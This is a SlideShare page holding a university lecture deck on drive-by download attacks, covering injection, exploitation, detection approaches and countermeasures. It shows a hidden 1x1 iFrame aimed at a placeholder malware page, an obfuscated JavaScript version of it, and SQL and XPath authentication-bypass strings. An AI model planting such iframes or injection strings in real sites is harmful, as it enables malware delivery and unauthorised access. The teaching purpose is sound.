SlideShare une entreprise Scribd logo

Drive by downloads-cns

Télécharger en tant que PPTX, PDF
M
mmubashirkhan
Technologie
1  sur  29
Drive-By Downloads Presenter: Darakhshan Naz Teacher: Professor Dr. Muhammad Mubashir Khan 04.05.2013 1
Agenda  Introduction  Mechanisms of Drive-by Download  General Detection Approach  Security Measures  Assessment & Conclusion 2
What is Drive-by Download?  A technique that involves ◦ Intended downloads without understanding consequenes  E.g. Executables ◦ Unintended downloads  E.g. Virus, spyware  Can happen by: ◦ Visiting a website ◦ Viewing an email message  Installs malicious program, termed as Malwares ◦ Through Malwares, attacker gets full or partial control of victim‘s system 3
4 (2) Read email Contains a website link (3) Attract user‘s interest User Click Website has many links (5) Surf every site but getting bored (no interest develop) Close website User Attacker (6) Sends user a spoofed Email User‘s browser (7) Attacker sends malicious code and exploit vulnerability (8) Malicious code creates connection between user and attacker (9) Download and install its backdoor Program (10) Steal all user‘s important files and make him compromised over network Example - Scenario Drive – By Download ! Source of Concept : Report- Defence against Drive-by Download by National Security Agency US User is completely unaware of attack (4) Go to website(1) Open Browser
Purpose of Drive-by Download • Provide gateway to botnets. • Take advantages of vulnerabilities. • Steal personal or confidential information of user. • Leads or redirects user to other malicious websites and make him compromised. 5
Mechanisms of Drive-by Download 6 Basic Concept of Drive-by Download Attack (Source: [1]) 1 2 43 Injection Exploitation
Injection  What is Injection : ◦ The act of entering data into application by bypassing security controls and change its behaviour in unexpected way.  Reason of Injection : ◦ Existance of vulnerabilities.  Drive-by Download initates by the injection of malicious code in database, application or server.  Ways of Malicious code injection: ◦ Injection through iFrames ◦ SQL Injection ◦ XPATH Injection 7
How and where to Inject ? 8Source : http://www.malware-info.com/mal_faq_inject.html • SQL Injection • Xpath Injection Injection through iFrames Malware placed directly on Webserver
Injection through iFrames  The most basic form of injected code is a malicious iFrame such as:  Example: <div style=visibility: hidden; position: absolute: 1; top:1> <iframe id=IFRAME name=IFRAME src= http://www.example.com/page_with_malware.htm scrolling= no width=1 height=1 vspace=0 hspace=0 frameborder=0> </iframe> </div> 9 This iFrame is present in the HTML of a requested web page Content from this source render in an invisible 1 pixel x 1 pixel window. Sometimes, iFrames present in encoded form that seems normal. The process of encoding is known as "obfuscation“.
Obfuscation  The process of disguising code through encoding.  The previous iFrame can be converted to a JavaScript Unicode string using any encoding tool.  Encoding tool: http://www.auditmypc.com/html- encoder.asp  On browsing of injected page, the JavaScript dynamically generates an iframe.  This causes malicious content from a website controlled by an attacker to execute inside the requested web page. 10
Obfuscation  Obfuscated form of iFrame is : <script type="text/javascript">document.write('u003Cu0064u0069u0076u0020u0073u00 74u0079u006Cu0065u003Du0076u0069u0073u0069u0062u0069u006Cu006 9u0074u0079u003Au0020u0068u0069u0064u0064u0065u006Eu003Bu0020 u0070u006Fu0073u0069u0074u0069u006Fu006Eu003Au0020u0061u0062u 0073u006Fu006Cu0075u0074u0065u003Au0020u0031u003Bu0020u0074u0 06Fu0070u003Au0031u003Eu0020u0020u0020u0020u0020u0020u0020u00 20u0020u0020u0020u003Cu0069u0066u0072u0061u006Du0065u0020u006 9u0064u003Du0049u0046u0052u0041u004Du0045u0020u006Eu0061u006D u0065u003Du0049u0046u0052u0041u004Du0045u000Du0020u0020u0020 u0073u0072u0063u003Du0020u0068u0074u0074u0070u003Au002Fu002Fu 0077u0077u0077u002Eu0065u0078u0061u006Du0070u006Cu0065u002Eu0 063u006Fu006Du002Fu0070u0061u0067u0065u005Fu0077u0069u0074u00 68u005Fu006Du0061u006Cu0077u0061u0072u0065u002Eu0068u0074u006 Du000Du0020u0020u0020u0073u0063u0072u006Fu006Cu006Cu0069u006 Eu0067u003Du0020u006Eu006Fu0020u0077u0069u0064u0074u0068u003D u0031u0020u0068u0065u0069u0067u0068u0074u003Du0031u0020u0076u 0073u0070u0061u0063u0065u003Du0030u000Du0020u0020u0020u0020u0 068u0073u0070u0061u0063u0065u003Du0030u0020u0020u0066u0072u00 61u006Du0065u0062u006Fu0072u0064u0065u0072u003Du0030u003Eu000 Du003Cu002Fu0069u0066u0072u0061u006Du0065u003Eu000Du003Cu002 Fu0064u0069u0076u003Eu000Du000D');</script> 11
SQL Injection  Bypass the authentication process.  Provide access of data to malicious user or attacker.  Example : In any userForm page if we enter Username: 'or‘1‘=‘1 and Password: 'or‘1‘=‘1 then webpage will execute this query form SELECT * FROM Users WHERE Username=`1' OR `1' = `1‘ AND Password = `1' OR `1' = `1‘ Parameters have always logical true condition Authentication process is validated and attacker can get access to any account in database. 12
XPATH Injection  Almost similar to SQL Injection.  Now “target“ is XML Document.  Insecurity caused by the injection of XPATH query or conditions through webpage.  Example : ◦ If any user has an account in any site with Username=John and Password = test123, then logically he will see his account only. • If same user enters his username like John' or 1 = 1 with same password then system will authenticate him and show the entire XML document to him. 13
Mechanism of Drive-by Download 14 Basic Concept of Drive-by Download Attack (Source: [1]) 1 2 43 Injection Exploitation
Exploitation  What is Exploitation : ◦ The act by an attacker to perform activities on victim‘s system on his own wish after getting full or partial control.  Reason of Exploitation: ◦ Ignore the updating of installed applications. ◦ According to Secunia PSI, about 95.46% users have one or more insecure applications. ◦ Newer version may correct one or more vulnerabilities in the installed application.  Vulnerabilities that are mostly exploited : ◦ Browser Vulnerability. ◦ Plugin Vulnerability. ◦ File Format Vulnerability. 15
Types of Vulnerabilities  Browser Vulnerability ◦ Attacker injects malicious code into user‘s browser and changes its setting without his knowledge.  Plugin Vulnerability ◦ Plugin is provided by third parties that can be vulnerable; may lead to buffer overflows, memory corruption issues and pointer overwrites.  File Format Vulnerability ◦ Attackers attach malware to Word, Excel or PDF files, distributed through email or websites. Exploit will occur when editing program opens them. 16
General Detection Approach  Javascript-script based malwares seems difficult to detect and analyze.  Requires a comprehensive approach to detect both root cause and dynamic behaviour.  Specialized Detection Methods: ◦ CUJO[2]  Static + Dynamic analysis of Javascript  Detection through machine learning ◦ ARROW[8].  Create Regular Expression Signatures for servers of MDN.  Evaluate their effectiveness. Here the generalized detection approach will be discussed which is the basic idea to detect. 17
Step1: Analysis of JS Redirection  For an effective detection approach, analysis of JavaScript is mandatory. • User is victimized in two ways: • Either he may directly expose to vulnerable site. • Or an attacker reaches to him through a series of redirections.  Two approaches can be taken to investigate redirections. ◦ Implementing some settings into JavaScript code (e.g: document.location). ◦ Taking Browser‘s history. 18
Step2: JavaScript Deobfuscation  Most of the malicious JavaScript is in obfuscated (encoded) form.  Deobfuscation (conversion from complex form to simple form) can help to identify malicious code.  It is possible through manually or any automated tool.  Automated Tools : e.g: ◦ Development Tool in Google Chrome. ◦ Microsoft Script Debugger or Editor. 19
Step3: Detection of Memory Corruption  Most attacks corrupt the memory.  Attacker tries to enter into browser and run his shellcode. ◦ A shellcode is a small code through which attacker gets control of victim‘s system. • Attacker then uses JavaScript to allocate large number of strings for the shellcode. • These strings are not the part of real code but for memory allocation by the attacker. • Detection of these strings can give the indication of shellcode. 20
Contd.  Detection of these strings can be done through two ways: ◦ Controlling and maintaining of string variables whenever they are created. ◦ For automated detection, libemu library is used.  It searches from each character and when it finds a sequence of valid instructions, it reports shellcode. 21
Step4: Investigation of Exploitation  Exploitation is last step of Drive-by Download attack that take advantage of vulnerabilities.  It can be detected through two ways : ◦ Analysis of behaviours of Browsers and Plug-ins ◦ Monitoring of string passing as parameters and method calls. Usually long strings are used in exploits and certain methods are called in malware downloading. 22
Security Measures  Updation of softwares.  Installation of web-filtering softwares.  Implementation of BLADE(Block All Drive-by Download Exploits).  Proper management by Network Administrators.  Users should be careful while visiting sites specially entertainment and social sites as they may have Adversaries.  Usage of reputed search engines like Google, Microsoft, Yahoo, AVG or Bing.  Usage of Virtual Machine for Web Browsing. 23
The Good  Automated techniques (compiler or library) of deobfuscation is really helpful for the identification of malicious JavaScript.  Detection should be focussed on central points. ◦ Evilseed[11] provides a crawling approach focussing on central points of Malware.  Machine Learning can provide light weight Javascript analysis, fast detection mechanisms and handling of vulnerabilities in runtime.  Proper input validations can reduce SQL and XPATH injection. 24
The Bad  Can easily happen but very hard to overcome.  Possibilities of attack are rapidly increasing but validity of detection approaches is not possible every time.  Defensive approach is better to fight against these attacks because of two reasons : ◦ Intense Dynamic behaviour. ◦ Complex and time consuming detection approaches. 25
The Ugly  Mostly show unexpected behaviour.  Due to diversity of different ways of attack, it has high ratio of victims and it is difficult to design a detection approach that covers all possibilities.  Not any computing device seems to be safe from Drive-by Download.  As Drive-by Download attack is increasing enormously, perhaps in near future, hard drives or portable device vulnerabilities may also exist. 26
Thanks for your attention 27
References(1) [1] Egele, M., Wurzinger, P., Kirda, E.: Defending Browsers against Drive-by Downloads: Mitigating Heap-Spraying Code Injection Attacks (2009). [2] Rieck, K., Krueger, T., Dewald, A.: CUJO-Ecient Detection and Prevention of Drive-by Download Attacks, Tecnische Universitaet Berlin. [3] Stone-Gross, B., Cova M. , Kruegel, C. , Vigna, G.: Peering through the iFrame University of California, University of Birmingham. [4] Westervelt, R.: Kaspersky website hacked (February 2009). [5] Cova, M. , Kruegel, C., Vigna G.: Detection and Analysis of Drive-by-Download Attacks andMalicious Javascript Code University of California, Santa Barbara From ACM digital library. [6] Interesting statistics from the Secunia PSI (January 2008) http://secunia.com/blog/18. 28
References(2) [7] Luy, L., Yegneswaranz, V., Porrasz, P.: BLADE: An Attack- Agnostic Approach for Preventing Drive-By Malware Infections College of Computing, Georgia Institute of Technology, SRI International From ACM digital library. [8] Zhang, J., Seifert, C., Stokes, J.W., Lee, W. : ARROW: Generating Signatures to Detect Drive-By Downloads Georgia Institute of Technology, Microsoft Bing, Microsoft Research [9] Devi, D., Pathak, D., Nandi, S.: Vulnerabilities in Web Browsers Indian Institute of Technology, Guwahati, India. [10] Provos, N., Mavrommatis, P., Moheeb, A. R., Monrose, F.: All your Iframes point to us Google Inc., Johns Hopkins University. [11] Invernizzi, L., Benvenuti, S., Cova, M., Comparetti, P., M., Krueg el, C., Vigna,G.:EVILSEED: A Guided Approach to Finding MaliciousWeb Pages, 2012 IEEE Symposium on Security and Privacy 29

Recommandé

La sécurité informatique expliquée aux salariés
La sécurité informatique expliquée aux salariésLa sécurité informatique expliquée aux salariés
La sécurité informatique expliquée aux salariésNRC
 
Ceh v5 module 14 sql injection
Ceh v5 module 14 sql injectionCeh v5 module 14 sql injection
Ceh v5 module 14 sql injectionVi Tính Hoàng Nam
 
Spyware
SpywareSpyware
SpywareIshita Bansal
 
BackDoors Seminar
BackDoors SeminarBackDoors Seminar
BackDoors SeminarChaitali Patel
 
Spyware presentation by mangesh wadibhasme
Spyware presentation by mangesh wadibhasmeSpyware presentation by mangesh wadibhasme
Spyware presentation by mangesh wadibhasmeMangesh wadibhasme
 
Pranavi verma-cyber-security-ppt
Pranavi verma-cyber-security-pptPranavi verma-cyber-security-ppt
Pranavi verma-cyber-security-pptPranaviVerma
 
Phishing techniques
Phishing techniquesPhishing techniques
Phishing techniquesSushil Kumar
 
Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...Edureka!
 

Recommandé

La sécurité informatique expliquée aux salariés
La sécurité informatique expliquée aux salariésLa sécurité informatique expliquée aux salariés
La sécurité informatique expliquée aux salariésNRC
 
Ceh v5 module 14 sql injection
Ceh v5 module 14 sql injectionCeh v5 module 14 sql injection
Ceh v5 module 14 sql injectionVi Tính Hoàng Nam
 
Spyware
SpywareSpyware
SpywareIshita Bansal
 
BackDoors Seminar
BackDoors SeminarBackDoors Seminar
BackDoors SeminarChaitali Patel
 
Spyware presentation by mangesh wadibhasme
Spyware presentation by mangesh wadibhasmeSpyware presentation by mangesh wadibhasme
Spyware presentation by mangesh wadibhasmeMangesh wadibhasme
 
Pranavi verma-cyber-security-ppt
Pranavi verma-cyber-security-pptPranavi verma-cyber-security-ppt
Pranavi verma-cyber-security-pptPranaviVerma
 
Phishing techniques
Phishing techniquesPhishing techniques
Phishing techniquesSushil Kumar
 
Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...Edureka!
 
8 Types of Cyber Attacks That Can Bother CISOs in 2020
8 Types of Cyber Attacks That Can Bother CISOs in 20208 Types of Cyber Attacks That Can Bother CISOs in 2020
8 Types of Cyber Attacks That Can Bother CISOs in 2020SecPod Technologies
 
Sécurité informatique
Sécurité informatiqueSécurité informatique
Sécurité informatiqueoussama Hafid
 
Malware
MalwareMalware
Malwarejosefrozhi12
 
14 tips to increase cybersecurity awareness
14 tips to increase cybersecurity awareness14 tips to increase cybersecurity awareness
14 tips to increase cybersecurity awarenessMichel Bitter
 
What is Ransomware
What is RansomwareWhat is Ransomware
What is Ransomwarejeetendra mandal
 
Ceh v5 module 04 enumeration
Ceh v5 module 04 enumerationCeh v5 module 04 enumeration
Ceh v5 module 04 enumerationVi Tính Hoàng Nam
 
Vulnerability and Assessment Penetration Testing
Vulnerability and Assessment Penetration TestingVulnerability and Assessment Penetration Testing
Vulnerability and Assessment Penetration TestingYvonne Marambanyika
 
Network Security Nmap N Nessus
Network Security Nmap N NessusNetwork Security Nmap N Nessus
Network Security Nmap N NessusUtkarsh Verma
 
Sigma and YARA Rules
Sigma and YARA RulesSigma and YARA Rules
Sigma and YARA RulesLionel Faleiro
 
Spyware
SpywareSpyware
SpywareKardan university, kabul , Afghanistan
 
Social Engineering.pdf
Social Engineering.pdfSocial Engineering.pdf
Social Engineering.pdfMeshalALshammari12
 
Vulnerability Assessment and Penetration Testing Report
Vulnerability Assessment and Penetration Testing Report Vulnerability Assessment and Penetration Testing Report
Vulnerability Assessment and Penetration Testing Report Rishabh Upadhyay
 
Cyber crime and cyber security
Cyber crime and cyber securityCyber crime and cyber security
Cyber crime and cyber securityKeshab Nath
 
Hydra
HydraHydra
Hydrapenetration Tester
 
malware
malware malware
malware Deepak Chawla
 
Phishing définition, statistiques, solutions
Phishing définition, statistiques, solutionsPhishing définition, statistiques, solutions
Phishing définition, statistiques, solutionsStephane Manhes
 
Spywares & Keyloggers
Spywares & KeyloggersSpywares & Keyloggers
Spywares & KeyloggersJithin James
 
CyberSecurity
CyberSecurityCyberSecurity
CyberSecuritydivyanshigarg4
 
Web application security
Web application securityWeb application security
Web application securityKapil Sharma
 
10 règles de securite de la sécurité informatique
10 règles de securite de la sécurité informatique10 règles de securite de la sécurité informatique
10 règles de securite de la sécurité informatiquedynamicemploi
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelinesZakaria SMAHI
 
VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxkarthikvcyber
 

Contenu connexe

Tendances

8 Types of Cyber Attacks That Can Bother CISOs in 2020
8 Types of Cyber Attacks That Can Bother CISOs in 20208 Types of Cyber Attacks That Can Bother CISOs in 2020
8 Types of Cyber Attacks That Can Bother CISOs in 2020SecPod Technologies
 
Sécurité informatique
Sécurité informatiqueSécurité informatique
Sécurité informatiqueoussama Hafid
 
14 tips to increase cybersecurity awareness
14 tips to increase cybersecurity awareness14 tips to increase cybersecurity awareness
14 tips to increase cybersecurity awarenessMichel Bitter
 
Vulnerability and Assessment Penetration Testing
Vulnerability and Assessment Penetration TestingVulnerability and Assessment Penetration Testing
Vulnerability and Assessment Penetration TestingYvonne Marambanyika
 
Network Security Nmap N Nessus
Network Security Nmap N NessusNetwork Security Nmap N Nessus
Network Security Nmap N NessusUtkarsh Verma
 
Vulnerability Assessment and Penetration Testing Report
Vulnerability Assessment and Penetration Testing Report Vulnerability Assessment and Penetration Testing Report
Vulnerability Assessment and Penetration Testing Report Rishabh Upadhyay
 
Cyber crime and cyber security
Cyber crime and cyber securityCyber crime and cyber security
Cyber crime and cyber securityKeshab Nath
 
Phishing définition, statistiques, solutions
Phishing définition, statistiques, solutionsPhishing définition, statistiques, solutions
Phishing définition, statistiques, solutionsStephane Manhes
 
Spywares & Keyloggers
Spywares & KeyloggersSpywares & Keyloggers
Spywares & KeyloggersJithin James
 
Web application security
Web application securityWeb application security
Web application securityKapil Sharma
 
10 règles de securite de la sécurité informatique
10 règles de securite de la sécurité informatique10 règles de securite de la sécurité informatique
10 règles de securite de la sécurité informatiquedynamicemploi
 

Tendances (20)

8 Types of Cyber Attacks That Can Bother CISOs in 2020
8 Types of Cyber Attacks That Can Bother CISOs in 20208 Types of Cyber Attacks That Can Bother CISOs in 2020
8 Types of Cyber Attacks That Can Bother CISOs in 2020
 
Sécurité informatique
Sécurité informatiqueSécurité informatique
Sécurité informatique
 
Malware
MalwareMalware
Malware
 
14 tips to increase cybersecurity awareness
14 tips to increase cybersecurity awareness14 tips to increase cybersecurity awareness
14 tips to increase cybersecurity awareness
 
What is Ransomware
What is RansomwareWhat is Ransomware
What is Ransomware
 
Ceh v5 module 04 enumeration
Ceh v5 module 04 enumerationCeh v5 module 04 enumeration
Ceh v5 module 04 enumeration
 
Vulnerability and Assessment Penetration Testing
Vulnerability and Assessment Penetration TestingVulnerability and Assessment Penetration Testing
Vulnerability and Assessment Penetration Testing
 
Network Security Nmap N Nessus
Network Security Nmap N NessusNetwork Security Nmap N Nessus
Network Security Nmap N Nessus
 
Sigma and YARA Rules
Sigma and YARA RulesSigma and YARA Rules
Sigma and YARA Rules
 
Spyware
SpywareSpyware
Spyware
 
Social Engineering.pdf
Social Engineering.pdfSocial Engineering.pdf
Social Engineering.pdf
 
Vulnerability Assessment and Penetration Testing Report
Vulnerability Assessment and Penetration Testing Report Vulnerability Assessment and Penetration Testing Report
Vulnerability Assessment and Penetration Testing Report
 
Cyber crime and cyber security
Cyber crime and cyber securityCyber crime and cyber security
Cyber crime and cyber security
 
Hydra
HydraHydra
Hydra
 
malware
malware malware
malware
 
Phishing définition, statistiques, solutions
Phishing définition, statistiques, solutionsPhishing définition, statistiques, solutions
Phishing définition, statistiques, solutions
 
Spywares & Keyloggers
Spywares & KeyloggersSpywares & Keyloggers
Spywares & Keyloggers
 
CyberSecurity
CyberSecurityCyberSecurity
CyberSecurity
 
Web application security
Web application securityWeb application security
Web application security
 
10 règles de securite de la sécurité informatique
10 règles de securite de la sécurité informatique10 règles de securite de la sécurité informatique
10 règles de securite de la sécurité informatique
 

Similaire à Drive by downloads-cns

Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelinesZakaria SMAHI
 
VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxkarthikvcyber
 
Cq3210191021
Cq3210191021Cq3210191021
Cq3210191021IJMER
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxDARSHANBHAVSAR14
 
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...IBM Security
 
30ITSecurityThreatsVulnerabilitiesandCountermeasuresV1.ppt
30ITSecurityThreatsVulnerabilitiesandCountermeasuresV1.ppt30ITSecurityThreatsVulnerabilitiesandCountermeasuresV1.ppt
30ITSecurityThreatsVulnerabilitiesandCountermeasuresV1.pptKaukau9
 
Network security, seriously?
Network security, seriously?Network security, seriously?
Network security, seriously?Peter Wood
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks Ahmed Sherif
 
Security Testing
Security TestingSecurity Testing
Security TestingISsoft
 
Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing Priyanka Aash
 
7 Steps to Threat Modeling
7 Steps to Threat Modeling7 Steps to Threat Modeling
7 Steps to Threat ModelingDanny Wong
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015 sebaSolvay secure application layer v2015 seba
Solvay secure application layer v2015 sebaSebastien Deleersnyder
 
Client-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationClient-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationChris Gates
 
Application Security Guide for Beginners
Application Security Guide for Beginners Application Security Guide for Beginners
Application Security Guide for Beginners Checkmarx
 
Security Testing Training With Examples
Security Testing Training With ExamplesSecurity Testing Training With Examples
Security Testing Training With ExamplesAlwin Thayyil
 
Cyber attacks 101
Cyber attacks 101Cyber attacks 101
Cyber attacks 101Rafel Ivgi
 

Similaire à Drive by downloads-cns (20)

Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelines
 
VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptx
 
Cq3210191021
Cq3210191021Cq3210191021
Cq3210191021
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
 
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
 
30ITSecurityThreatsVulnerabilitiesandCountermeasuresV1.ppt
30ITSecurityThreatsVulnerabilitiesandCountermeasuresV1.ppt30ITSecurityThreatsVulnerabilitiesandCountermeasuresV1.ppt
30ITSecurityThreatsVulnerabilitiesandCountermeasuresV1.ppt
 
Network security, seriously?
Network security, seriously?Network security, seriously?
Network security, seriously?
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks
 
Security testing
Security testingSecurity testing
Security testing
 
Security Testing
Security TestingSecurity Testing
Security Testing
 
Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing
 
Owasp top 10 2017
Owasp top 10 2017Owasp top 10 2017
Owasp top 10 2017
 
7 Steps to Threat Modeling
7 Steps to Threat Modeling7 Steps to Threat Modeling
7 Steps to Threat Modeling
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015 sebaSolvay secure application layer v2015 seba
Solvay secure application layer v2015 seba
 
Client-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationClient-Side Penetration Testing Presentation
Client-Side Penetration Testing Presentation
 
Application Security Guide for Beginners
Application Security Guide for Beginners Application Security Guide for Beginners
Application Security Guide for Beginners
 
Methods Hackers Use
Methods Hackers UseMethods Hackers Use
Methods Hackers Use
 
Security Testing Training With Examples
Security Testing Training With ExamplesSecurity Testing Training With Examples
Security Testing Training With Examples
 
Cyber attacks 101
Cyber attacks 101Cyber attacks 101
Cyber attacks 101
 
FALCON.pptx
FALCON.pptxFALCON.pptx
FALCON.pptx
 

Plus de mmubashirkhan

Two factor authentication presentation mcit
Two factor authentication presentation mcitTwo factor authentication presentation mcit
Two factor authentication presentation mcitmmubashirkhan
 
Situational awareness for computer network security
Situational awareness for computer network securitySituational awareness for computer network security
Situational awareness for computer network securitymmubashirkhan
 
Security threats and countermeasure in 3 g network
Security threats and countermeasure in 3 g networkSecurity threats and countermeasure in 3 g network
Security threats and countermeasure in 3 g networkmmubashirkhan
 
Comparison between traditional vpn and mpls vpn
Comparison between traditional vpn and mpls vpnComparison between traditional vpn and mpls vpn
Comparison between traditional vpn and mpls vpnmmubashirkhan
 
Security in wireless la ns
Security in wireless la ns Security in wireless la ns
Security in wireless la ns mmubashirkhan
 
Saa s multitenant database architecture
Saa s multitenant database architectureSaa s multitenant database architecture
Saa s multitenant database architecturemmubashirkhan
 
Improving intrusion detection system by honeypot
Improving intrusion detection system by honeypotImproving intrusion detection system by honeypot
Improving intrusion detection system by honeypotmmubashirkhan
 
Cyber security issues
Cyber security issuesCyber security issues
Cyber security issuesmmubashirkhan
 
Biometric security tech
Biometric security techBiometric security tech
Biometric security techmmubashirkhan
 
Authentication in manet
Authentication in manetAuthentication in manet
Authentication in manetmmubashirkhan
 
Advanced persistent threat (apt)
Advanced persistent threat (apt)Advanced persistent threat (apt)
Advanced persistent threat (apt)mmubashirkhan
 

Plus de mmubashirkhan (11)

Two factor authentication presentation mcit
Two factor authentication presentation mcitTwo factor authentication presentation mcit
Two factor authentication presentation mcit
 
Situational awareness for computer network security
Situational awareness for computer network securitySituational awareness for computer network security
Situational awareness for computer network security
 
Security threats and countermeasure in 3 g network
Security threats and countermeasure in 3 g networkSecurity threats and countermeasure in 3 g network
Security threats and countermeasure in 3 g network
 
Comparison between traditional vpn and mpls vpn
Comparison between traditional vpn and mpls vpnComparison between traditional vpn and mpls vpn
Comparison between traditional vpn and mpls vpn
 
Security in wireless la ns
Security in wireless la ns Security in wireless la ns
Security in wireless la ns
 
Saa s multitenant database architecture
Saa s multitenant database architectureSaa s multitenant database architecture
Saa s multitenant database architecture
 
Improving intrusion detection system by honeypot
Improving intrusion detection system by honeypotImproving intrusion detection system by honeypot
Improving intrusion detection system by honeypot
 
Cyber security issues
Cyber security issuesCyber security issues
Cyber security issues
 
Biometric security tech
Biometric security techBiometric security tech
Biometric security tech
 
Authentication in manet
Authentication in manetAuthentication in manet
Authentication in manet
 
Advanced persistent threat (apt)
Advanced persistent threat (apt)Advanced persistent threat (apt)
Advanced persistent threat (apt)
 

Dernier

Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxBkGupta21
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embeddingZilliz
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
